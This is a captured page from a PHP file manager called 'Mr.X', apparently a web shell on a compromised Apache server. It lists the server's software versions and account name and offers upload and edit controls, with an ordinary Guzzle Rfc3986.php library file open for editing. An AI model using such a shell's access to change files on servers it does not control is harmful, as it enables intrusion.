🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:Rfc3986.php
<?php declare(strict_types=1); namespace GuzzleHttp\Psr7; /** * @internal */ final class Rfc3986 { /** * Sub-delims for use in a regex. * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-2.2 */ public const CHAR_SUB_DELIMS = '!\$&\'\(\)\*\+,;='; /** * Unreserved characters for use in a regex. * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-2.3 */ public const CHAR_UNRESERVED = 'a-zA-Z0-9_\-\.~'; }
Save Changes
Cancel
Create New File
Create New Folder